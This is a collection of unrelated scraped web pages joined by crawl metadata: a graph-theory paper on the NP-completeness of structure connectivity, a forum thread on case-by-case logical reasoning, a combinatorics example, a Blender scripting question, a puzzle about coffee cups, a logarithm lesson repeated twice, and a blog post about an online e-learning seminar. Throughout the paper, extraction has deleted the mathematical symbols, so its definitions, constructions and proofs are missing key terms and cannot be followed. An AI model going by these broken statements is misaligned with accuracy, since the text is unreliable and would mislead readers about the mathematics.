• Perfect, thanks! – Roly Jan 6 at 19:44 | 2020-04-07 20:42:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8614292144775391, "perplexity": 6671.0357694465465}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371805747.72/warc/CC-MAIN-20200407183818-20200407214318-00209.warc.gz"} |
https://deepai.org/publication/on-the-complexity-of-structure-and-substructure-connectivity-of-graphs | # On the complexity of structure and substructure connectivity of graphs
The connectivity of a graph is an important parameter to measure its reliability. Structure and substructure connectivity are two novel generalizations of the connectivity. In this paper, we characterize the complexity of determining structure and substructure connectivity of graphs, showing that they are both NP-complete.
## Authors
• 5 publications
• 4 publications
• ### Structure and substructure connectivity of balanced hypercubes
The connectivity of a network directly signifies its reliability and fau...
08/06/2018 ∙ by Huazhong Lü, et al. ∙ 0
• ### Graffinity: Visualizing Connectivity In Large Graphs
Multivariate graphs are prolific across many fields, including transport...
03/22/2017 ∙ by Ethan Kerzner, et al. ∙ 0
• ### The star-structure connectivity and star-substructure connectivity of hypercubes and folded hypercubes
As a generalization of vertex connectivity, for connected graphs G and T...
09/29/2020 ∙ by Lina Ba, et al. ∙ 0
• ### Local structure of idempotent algebras II
In this paper we continue the study of edge-colored graphs associated wi...
06/18/2020 ∙ by Andrei A. Bulatov, et al. ∙ 0
• ### Using double Weil sums in finding the c-Boomerang Connectivity Table for monomial functions on finite fields
In this paper we characterize the c-Boomerang Connectivity Table (BCT), ...
07/19/2020 ∙ by Pantelimon Stanica, et al. ∙ 0
• ### A graph complexity measure based on the spectral analysis of the Laplace operator
In this work we introduce a concept of complexity for undirected graphs ...
09/14/2021 ∙ by Diego M. Mateos, et al. ∙ 0
• ### A note on 'A fully parallel 3D thinning algorithm and its applications'
A 3D thinning algorithm erodes a 3D binary image layer by layer to extra...
05/01/2019 ∙ by Tao Wang, et al. ∙ 0
##### This week in AI
Get the week's most popular data science and artificial intelligence research sent straight to your inbox every Saturday.
## 1. Introduction
The graph we considered throughout this paper is simple and undirected. Let be a graph, where is the vertex-set of and is the edge-set of . The degree of a vertex is the number of incident edges, written or when the context is clear. The minimum degree of is and the maximum degree is .
For any subset , the closed neighborhood of is defined to be all neighbors of any vertex together with , denoted by , while the open neighborhood of is , denoted by . If , then we write and , respectively. The subgraph induced by is denoted by . A matching of is a set of independent edges of . For other standard graph notations not defined here please refer to [1].
Lin et al. [9] introduced structure and substructure connectivity to evaluate the fault tolerance of a network from the perspective of a single vertex, as well as some special structures of the network. Let be a set of pairwise disjoint connected subgraphs of and let . Then is a subgraph-cut of provided that is disconnected or trivial. Let be a connected subgraph of , then is an -structure-cut if is a subgraph-cut, and each element in is isomorphic to . The -structure connectivity of , written , is the minimum cardinality over all -structure-cuts of . Similarly, if is a subgraph-cut and each element of is isomorphic to a connected subgraph of , then is called an -substructure-cut. The -substructure connectivity of , written , is the minimum cardinality over all -substructure-cuts of .
Structure and substructure connectivity of some famous interconnection networks have been determined, such as hypercube [9], -ary -cube [11], folded hypercube [12], balanced hypercube [10], arrangement graph [7], alternating group graphs [8]. A natural question arise: what is computational complexity of structure and substructure connectivity in general graphs? In this paper, we study this problem.
## 2. NP-complete of structure connectivity
3-dimensional matching, 3DM for short, is one of the most standard NP-complete problems to prove NP-complete results. An instance of 3DM consists of three disjoint sets , and with equal cardinality , and a set of triples . For convenience, let . The question is to decide whether there is a subset covering , that is, and each element of occurs in exactly one triple of . This instance can be associated with a bipartite graph as follows. Each element of and each triple of is represented by a vertex of . There is an edge between an element and a triple if and only if the element is a member of the triple.
It has been proved in [3, 4] that 3DM is NP-complete when each element of appears in only two or three triples of , i.e., each vertex in the partite set of has degree two or three only. We shall show that the decision problem of structure connectivity is NP-complete by reducing from 3DM stated previously.
To this end, we state the following decision problem.
Problem: The -structure connectivity of an arbitrary graph.
Instance: Given a nonempty graph , a subgraph of and a positive integer .
Question: Is ?
Now we are ready to prove the following theorem.
###### Theorem 1
. The -structure connectivity is NP-complete when for any integer .
###### Proof.
Obviously, the structure connectivity problem is in NP, because we can check in polynomial time whether a set of disjoint s is a structure cut or not. It remains to show that the structure connectivity is NP-hard when for any integer . We prove this argument by reducing 3DM to it.
Let be an instance of 3DM defined previously. For convenience, let and . We make a further assumption that each vertex in the partite set of has degree two or three only.
Now we construct a graph from as follows (see Fig. 1).
Set
Vj={vij|1≤i≤(M+1)|T|} for j=1,2,⋯,M−3,
^V=M−3⋃j=1Vj,
U={u1,u2,⋯,u3qM}, and
U′={u′1,u′2,⋯,u′3qM}.
The vertex set of is . The subgraph of induced by is for each . Similarly, The subgraph induced by is vertex disjoint and the subgraph induced by is .
So the edge set of is
E=E(Gb)∪(M−3)E(K(M+1)|T|)∪3qE(KM)∪E(K3qM)∪Et∪Ew∪Ez,
where , and .
We show that has a 3DM covering if and only if . First suppose that has a subset covering , that is, and each element of occurs in exactly one triple of . We show that . Clearly, for each vertex and hence the subgraph of induced by is isomorphic to . Thus, is a structure cut of with .
Next suppose that is a structure cut of with . We shall show that has a subset of covering . Recall that each vertex in the partite set of has degree two or three only, we may assume that the number of vertices with degree two (resp. three) in of is and (resp. ), and consequently, , which implies that .
Since each element of is a graph isomorphic to , we focus on the center vertex of . Let be the the set of center vertices of all , and let and . Since each vertex in has degree less than , any vertex in can not be center vertices of that is, . We claim that covers . Suppose on the contrary that does not cover , we shall show that is connected. Thus, two cases arise.
Case 1. . So . If there exists an edge such that and , then it is not hard to see that is connected, contradicting that is a structure cut of . Hence, all vertices in are covered by . Clearly, components in restricted on form a 3-dimensional matching of .
Case 2. . Note that for any vertex () and or 3 for any vertex (). By the structure of , each vertex in (as the center vertex of a ) can subvert at most one vertex in . Similarly, each vertex in can subvert precisely one vertex in together with three vertices in .
Since , we have . This implies that there exists an edge such that and . Obviously, after subverting vertices in , each clique either joins to or disappears, and similarly clique is decidedly joined to via one clique that joins. So is connected, a contradiction again.
This complete the proof. ∎
## 3. NP-complete of substructure connectivity
A vertex cover of is a subset such that for each edge , at least one of and belongs to . The decision version of the vertex cover problem is one of Karp’s 21 NP-complete problems [6] and is therefore a classical NP-complete problem.
We present the decision problem of the substructure connectivity as follows.
Problem: The substructure connectivity of an arbitrary graph.
Instance: Given a nonempty graph with , a subgraph of and a positive integer .
Question: Is ?
The following lemma will be used later.
###### Theorem 2
. The -substructure connectivity is NP-complete when .
###### Proof.
Obviously, the substructure connectivity problem is in NP, because we can check in polynomial time whether a set of disjoint subgraphs of is a substructure cut. It remains to show that the substructure connectivity is NP-hard when . We prove this argument by reducing vertex cover to this problem.
Given a graph with , we construct a graph from as follows (see Fig. 2).
Set
Vj={vij|1≤i≤|V|} for j=1,⋯,k+2,
^V=k+2⋃j=1Vj,and
V={v1,v2,⋯,v|V|}.
The vertex set of is . The subgraph of induced by is a complete graph for each .
So the edge set of is
E′=E∪(k+2)E(K|V|)∪Et
where .
We show that has a vertex cover of size at most if and only if .
First suppose that has a vertex cover with . We show that there exists a substructure cut of with . For any vertex , let . Then consists of a spanning subgraph of with center vertex . Let . Clearly, and . Thus, is disconnected with independent cliques , indicating that is a -substructure-cut of size at most . So .
Next suppose that is a -substructure-cut of with . We show that has a vertex cover of size at most .
Since each element of is a subgraph of , we focus on the center vertex of for (since each center vertex of covers all its neighbors). Let be the set of center vertices of , , and let . Thus, two cases arise.
Case 1. . Then there are vertices of that are adjacent to the vertices of not covered by . Since each vertex of is adjacent exactly one vertex in , the number of vertices of not covered by is not greater than the number of vertices in . Therefore, there exists a vertex cover of of size at most .
Case 2. . Then . Since there are disjoint cliques of size in , each () with center vertices in could subvert at most vertices in each . Thus, the remaining subgraph of consists of at least two cliques of size at least and the vertices in separate cliques are not adjacent. It implies that is connected and not a complete graph, which is a contradiction.
This completes the proof. ∎
Remark. The authors [2] constructed the similar graph as in Theorem 2 to prove NP-completeness of neighbor connectivity by reducing from dominating set problem. While we show NP-completeness of the substructure connectivity by reducing from vertex cover problem.
## References
• [1] J.A. Bondy, U.S.R. Murty, Graph theory, Springer, New York, 2007.
• [2] L.L. Doty, R.J. Goldstone, C.L. Suffel, Cayley graphs with neighbor connectivity one, SIAM J. Discrete Math. 9 (1996) 625–642.
• [3] M.E. Dyer, A.M. Frieze, On the complexity of partitioning graphs into connected subgraphs, Discrete Appl. Math. 10 (1985) 139–153.
• [4] M.E. Dyer, A.M. Frieze, Planar 3DM is NP-complete, J. Algor. 7(2) (1986) 174–184.
• [5] P. Hall, On representatives of subsets, J. Lond. Math. Soc. 10 (1935) 26–30.
• [6] R.M. Karp, Reducibility among combinatorial problems, In: R.E. Miller, J.W. Thatcher, J.D. Bohlinger (eds) Complexity of Computer Computations, The IBM Research Symposia Series, Springer, Boston, MA, 1972.
• [7] Y. Lei, J. Meng, Structure fault-tolerance of arrangement graphs, Appl. Math. Comput. 381 (2020) 125287.
• [8] X. Li, S. Zhou, X. Ren, X. Guo, Structure and substructure connectivity of alternating group graphs, Appl. Math. Comput. 391 (2021) 125639.
• [9] C.-K. Lin, L. Zhang, J. Fan, D. Wang, Structure connectivity and substructure connectivity of hypercubes, Theor. Comput. Sci. 634 (2016) 97–107.
• [10] H. Lü, T. Wu, Structure and substructure connectivity of balanced hypercubes, Bull. Malays. Math. Sci. Soc. 43 (2020) 2659–2672.
• [11] Yali Lv, J. Fan, D.F. Hsu, C.-K. Lin, Structure connectivity and substructure connectivity of -ary -cube networks, Inform. Sci. 433–434 (2018) 115–124.
• [12] E. Sabir, J. Meng, Structure fault tolerance of hypercubes and folded hypercubes, Theor. Comput. Sci. 711 (2018) 44–55. | 2021-12-04 02:56:56 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8223023414611816, "perplexity": 888.6715063521714}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964362923.11/warc/CC-MAIN-20211204003045-20211204033045-00086.warc.gz"} |
https://www.physicsforums.com/threads/a-type-of-reasoning.982901/ | # A type of reasoning
• B
## Main Question or Discussion Point
I am reading a pdf where, under a "classic ways of reasoning" section, the author introduced a method called la disjonction de cas, which I think in English would be "case by case" reasoning. He enounced it as follows:
$$\text{Let }\mathrm A,\,\mathrm B\text{ and }\mathrm C\text{ be three propositions, then:}\\ \text{This implication is always true: } ((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))\Rightarrow((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)$$
I am not sure I understand the point of this, here's how I am thinking about it:
If I can show that ##((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))## is true, then I have proved that ##((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)## is true. I know nothing about the truth value of ##\mathrm C##, so I should prove that both ##\mathrm A## and ##\mathrm B## are true to force the truthfulness of the proposition on the left side of the main implication and thus that on the right.
I feel that I am missing something, though, or that I am not seeing the main point. If you could evaluate my reasoning, and/or add something more, I'd be grateful.
EDIT: I should prove that the implications on both sides of the conjunction are true not ##\mathrm A## and ##\mathrm B##, since showing the latter propositions to be doesn't imply that the right side of the main implication is true as ##\mathrm C## might not follow.
Last edited:
Related Set Theory, Logic, Probability, Statistics News on Phys.org
Mark44
Mentor
I am reading a pdf where, under a "classic ways of reasoning" section, the author introduced a method called la disjonction de cas, which I think in English would be "case by case" reasoning. He enounced it as follows:
$$\text{Let }\mathrm A,\,\mathrm B\text{ and }\mathrm C\text{ be three propositions, then:}\\ \text{This implication is always true: } ((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))\Rightarrow((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)$$
I am not sure I understand the point of this, here's how I am thinking about it:
If I can show that ##((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))## is true, then I have proved that ##((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)## is true.
No, that's not how it works. If you are trying to prove the overall implication, you would need to also show that ##(A \vee B) \Rightarrow C## is true.
archaic said:
I know nothing about the truth value of ##\mathrm C##, so I should prove that both ##\mathrm A## and ##\mathrm B## are true to force the truthfulness of the proposition on the left side of the main implication and thus that on the right.
I feel that I am missing something, though, or that I am not seeing the main point. If you could evaluate my reasoning, and/or add something more, I'd be grateful.
EDIT: I should prove that the implications on both sides of the conjunction are true not ##\mathrm A## and ##\mathrm B##, since showing the latter propositions to be doesn't imply that the right side of the main implication is true as ##\mathrm C## might not follow.
One way to establish the overall implication is to use a truth table. From my work, it looks like the overall implication actually goes both ways.
What the implication is saying is that if A implies C and B implies C, then either A or B implies C.
Here's a simple example of the implication being used.
Define A as the statement ##x = 1##.
Define B as the statement ##x = -1##.
Define C as the statement ##x^2 = 1##.
Clearly ##A \Rightarrow C##, and ##B \Rightarrow C##, so ##(A \Rightarrow C) \wedge (B \Rightarrow C)##
Then, if either x = 1 or x = -1, then ##x^2## will be 1. In symbols, ##(A \vee B) \Rightarrow C##.
Klystron and archaic
No, that's not how it works. If you are trying to prove the overall implication, you would need to also show that (A∨B)⇒C(A∨B)⇒C(A \vee B) \Rightarrow C is true.
But the overall implication is always true! If ##\mathrm P\Rightarrow\mathrm Q## is true, then if I show that ##\mathrm P## is true, it follows that ##\mathrm Q## is true using the truth table of the implication (keeping in mind that implication is true).
Mark44
Mentor
But the overall implication is always true! If ##\mathrm P\Rightarrow\mathrm Q## is true, then if I show that ##\mathrm P## is true, it follows that ##\mathrm Q## is true using the truth table of the implication (keeping in mind that implication is true).
It's not clear to me what you're trying to do. If you are merely using the implication, then yes, if P is true, Q must also be true. OTOH, if you are trying to prove the implication, you must show that when P is true, it necessarily follows that Q will be true. Note that for an implication ##P \Rightarrow Q##, the only situation in which the implication is false is when P is true but Q is false. All other combinations of truth values result in a true implication.
archaic | 2020-08-05 16:33:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8586509227752686, "perplexity": 863.8878849082299}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439735963.64/warc/CC-MAIN-20200805153603-20200805183603-00353.warc.gz"} |
https://www.techtud.com/chapter/12161/12184/23675 | ##### Example 4c Sheldon Ross
Consider a set of n antennas of which m are defective and n − m are functional and assume that all of the defectives and all of the functionals are considered indistinguishable. How many linear orderings are there in which no two defectives are consecutive?
Now, if no two defectives are to be consecutive, then the spaces between the functional antennas must each contain at most one defective antenna That is, in the n − m + 1 possible positions—represented in Figure 1.1 by carets—between the n − m functional antennas, we must select m of these in which to put the defective antennas. Hence, there are ${n - m + 1 \choose m}$ possible orderings in which there is at least one functional antenna between any two defective ones. | 2020-01-18 20:10:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7913074493408203, "perplexity": 422.6374165990061}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250593937.27/warc/CC-MAIN-20200118193018-20200118221018-00484.warc.gz"} |
https://blender.stackexchange.com/questions/136455/how-to-get-posebone-global-rotate | # How to get posebone global rotate [duplicate]
A bone was rotated 90 degrees on the Y axis.
I simply want to get (0, 90, 0), but in Blender it is represented by Euler angles (86.4, 44.9, 66.3).
How do I get rotation on the global axis In Python code?
import bpy
obj = bpy.data.objects["Armature"]
for pbone in obj.pose.bones:
rotate_x = pbone.rotation_euler.x ##1.5072393417358398 (Euler)
rotate_y = pbone.rotation_euler.y ##0.7828118801116943 (Euler)
rotate_z = pbone.rotation_euler.z ##1.1571569442749023 (Euler)
'''
rotate_x _y _z are all euler angles of Bone.
But I want to get these as below.
It will be
rotate_x = 0
rotate_y = 1.5708(or 90)
rotate_z = 0
because rotate 90 degrees on Axis Y.
'''
• Possibly, Blender's bone may not be able to obtain the rotation angle on the global axis. I searched for a reference, but there was no code that could get the rotation angle on the global axis anywhere. – PERIPERI Apr 8 '19 at 3:20
• For example, suppose you rotate 90 degrees on the global Y axis. (0, 90, 0) is the desired value. However, Blender always refers to the local rotation angle. Even if it rotates on the global axis, the value of the rotation angle is displayed as rotation on the local axis. – PERIPERI Apr 8 '19 at 3:26 | 2020-08-10 11:16:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3466906249523163, "perplexity": 2073.2661720411134}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738674.42/warc/CC-MAIN-20200810102345-20200810132345-00165.warc.gz"} |
https://brilliant.org/problems/coffee-cup-finance/ | # Coffee cup finance
Calculus Level 2
To use a coffee machine, you fill a drinking cup with water, pour the water into the reservoir, and then put your cup under the spout. Once the water is heated, it flows through coffee grounds and into your cup. Once you use a cup to drink, it is coated with sugar, coffee, and other residues that would ruin the internal workings of the coffee machine, so you cannot reuse the cup.
If instead, you use two cups, one that you always use to fill the coffee machine with water, and a second that you always use to collect the coffee, you can limit the number of coffee cups you have to use in total to two.
Question: Which of the following functions describes your fractional savings in the total number of coffee cups you've had to use as a function of $c$, the number of cups of coffee you've made?
× | 2020-07-12 07:48:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 5, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32447367906570435, "perplexity": 640.6251202749864}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657131734.89/warc/CC-MAIN-20200712051058-20200712081058-00404.warc.gz"} |
http://greenemath.com/Algebra%20II/70/LogarithmicFunctionsPracticeSet.html | # In this Section:
In this section, we will learn about logarithmic functions. In a previous lesson, we learned about exponential functions such as: f(x) = ax. When we take the inverse of this function, we end up with: x = ay. Up to this point, we have not learned any method that would allow us to solve for the dependent variable y. Logarithms provide a way to perform this operation. We can say that: y = loga(x) is the same as: x = ay. So for all intents and purposes, a logarithm is an exponent. When we see loga(x), we are asking for the exponent to which the base (a) must be raised to obtain (x). As an example, suppose we see: log2(8). We are asking what exponent must the base (2) be raised to, in order to obtain 8. The answer is 3, since 23 = 8 : log2(8) = 3. We will begin by learning how to convert between exponential and logarithmic form. The process is fairly simple, we just need to understand what is being isolated in each scenario. In exponential form: 32 = 9, here 9, the power is isolated. In logarithmic form, we have: log3(9) = 2, here 2, the exponent is isolated. We will then move into solving logarithmic equations. We solve these equations by converting into exponential form and solving the resulting equation. Lastly, we will look at how to sketch the graph of a logarithmic function.
Sections:
# In this Section:
In this section, we will learn about logarithmic functions. In a previous lesson, we learned about exponential functions such as: f(x) = ax. When we take the inverse of this function, we end up with: x = ay. Up to this point, we have not learned any method that would allow us to solve for the dependent variable y. Logarithms provide a way to perform this operation. We can say that: y = loga(x) is the same as: x = ay. So for all intents and purposes, a logarithm is an exponent. When we see loga(x), we are asking for the exponent to which the base (a) must be raised to obtain (x). As an example, suppose we see: log2(8). We are asking what exponent must the base (2) be raised to, in order to obtain 8. The answer is 3, since 23 = 8 : log2(8) = 3. We will begin by learning how to convert between exponential and logarithmic form. The process is fairly simple, we just need to understand what is being isolated in each scenario. In exponential form: 32 = 9, here 9, the power is isolated. In logarithmic form, we have: log3(9) = 2, here 2, the exponent is isolated. We will then move into solving logarithmic equations. We solve these equations by converting into exponential form and solving the resulting equation. Lastly, we will look at how to sketch the graph of a logarithmic function. | 2018-03-22 23:27:35 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8069339990615845, "perplexity": 219.55747245218046}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257648103.60/warc/CC-MAIN-20180322225408-20180323005408-00721.warc.gz"} |
http://www.randform.org/blog/?p=1742 | ## Ikarus
In this post a class/seminar about collaborative e-learning was mentioned in which I took part in 2004. The seminar was called “Ikarus”. I just noticed that the seminar, which was made accessible online in an anonymized fashion was taken offline recently (somewhat justifying the naming ikarus ). Since I found no documentation about the seminar, I would like to use this post to document a bit what this seminar was about, because I think it was a truly innovative occasion.
First I like to explain a bit about my personal motivation for taking part in the seminar. I feel a bit pressured to justify what this seminar had to do with math/physics (and also with art/design):
### personal motivation
As one can see at the daytar exhibition, the issue of communication via virtual means is a central topic of our media experiments – especially in the aspects which are related to math/physics. The seminar was one occasion to learn more about this issue in general.
It is an issue about which I thought since a long time. Like in 1987 I wrote about the future possibilities in scientific visualization with a part on interactive math as part of a class assignment in computer graphics at MIT’s media lab. (Unfortunately I loaned out my only copy of the report to someone in Berlin who threw it away accidentally and I doubt that the media lab professor of that class kept a copy:)).
The emphasis of the Ikarus seminar on the collaborative aspect was of particular interest for me, since I hoped to learn more about the crucial inputs for online collaboration. Admittingly the motivation was fueled by a more or less failed attempt to encourage an online discussion (in hope for collaboration) on the mailing list of the European Women in Mathematics (EWM).
What happened with the EWM mailing list? Before 1998/99 the EWM mailing list was usually used for job and conference announcements and a little bit for discussions about issues concerning women mathematicians. However due to the war in former Yugoslavia the discussions became suddenly very political and heated. So quite a bit of women wanted to be taken off the list, because they didnt want to be involved in these discussions.
Some people proposed to forbid the discussions, in order to avoid that the network gets distroyed. I found this idea not so good, since I think especially in wartimes one has to discuss and so proposed to introduce two lists, instead of one. One list, where all participants are included, which distributes the announcements, i.e. an “ewm-announce” list and a second list, which is a sublist called “ewm-discuss”, contained in ewm-announce, where people can in addition discuss and whose participation is optional. After a discussion the two lists were established in 1999 via the JISC mailing network and they still exist, however there is not much discussion going on in ewm-discuss. So my contribution didnt really further collaboration, although it enabled it in principle.
Hence for the Ikarus seminar I hoped to learn more about how to FURTHER online collaboration (rather than e-learning in the classical sense) and indeed – the Ikarus class spurred my thoughts about this more than I tought. Last not least it helped me to set up an Moodle environment, inluding a library, fora, wiki, chatrooms etc. as an environment for string theorists to discuss scientific issues. I was not fully content with Moodle, in particular the structuring of groups was a bit unfortunate, however it was the best open source environment around at that time in my opinion. Unfortunately the attempt to set up a collaboration for the string theorists also sort of failed, in that that the involved scientists were not interested in using it:)
In addition in 2004 I asked the head of the mathematical Oberwolfach Institute Prof. Greuel, if Oberwolfach wouldnt be interested in setting up an Internet platform network for scientists in order to allow to post-collaborate on mathematical issues (as a kind of extended online seminar). However Oberwolfach was not interested.
Nevertheless the idea of an collaborative online platform/network for scientists kept me haunted since then. And in fact Tim and me tried to think about how to improve tools for such a task, like in this post our (very slowly) ongoing project witgiz/jsymbol was already mentioned (the project was actually summarized in a proposal which was submitted to the first issue of vectors called evidence in 2005 (but not accepted:)) Moreover the paper focuses on the (3D) visual aspects, however the extension to other organoleptic accesses (please look at the images of a talk in Tokyo in 2003 about this issue) is straightforward. It is clear that the technical design and ressources of a collaboration platform are important. In particular more or less self-organized growing social networks, like facebook, or e.g. the nature network will allways be of a different type than a network, which comes from a given long established structure, like global academia.
As a matter of fact the modern scientist has to compete with his/her knowledge against a market of brain occupying psychological founded instruments, so I became a bit more interested in marketing, psychology and likewise measures. Like in this post I wrote about the scientific method and marketing. Or here about semiotics and marketing. In general art and design which are -among others- concerned with the psychological and perceptional subtleties of representation are a very important ressource for exploring these issues, they are in particular important for visualization. Likewise serious games are belonging into this category and thus among others we tried to gain some competence with games. a.s.o.
The communication of mathematical contents by other then “traditional means” which was made accessible via the development of computers will in my eyes transform the ways mathematics and physics is perceived and transmitted by quite a bit and it had done already so in some branches and education (last not least by the kind of products kids have to deal with nowadays).
Finally all these thoughts on online collaboration and communication, but also my personal opinion that scientists shouldnt stay out of societal discussions made me write the proposal for an collaborative global network.
What do I mean with societal discussion? Let me ilustrate this at an short example:
Before I studied physics I was doing an internship at the Max-Planck-Institute for Biochemistry in Munich. It was the time of eighties nuclear arms race. I asked the Max-Planck officials wether it would be possible to set up a bookshelf in the library in the Institute on which people could leave political informations, like leaflets etc. In the end I discussed this issue with the head of the Max-Planck-Institute Prof. Hofschneider. He was against it, fearing that the scientists may feel politically indoctrinated.
My opinion was that first scientists should be professional enough to be able to abstract from indoctrination and secondly, that everybody could place information on the shelve, allowing for enough diversity. I am still indebted to Prof. Hofschneider that he devoted his whole lunch break to this issue and tried to make me understand. In the end we agreed that it is right that scientist SHOULD be professional enough to make the divide between personal opinions and science, but that in practise this OFTEN ENOUGH DOESNT WORK OUT.
Last not least this is also one reason why I emphasized in the proposal about the global science platform that the questions to be treated should be of scientific nature. And if there are questions of moral and ethics then these should be reflected as broadly and scientifically as possible.
But now lets get to the
### content of the Ikarus online seminar:
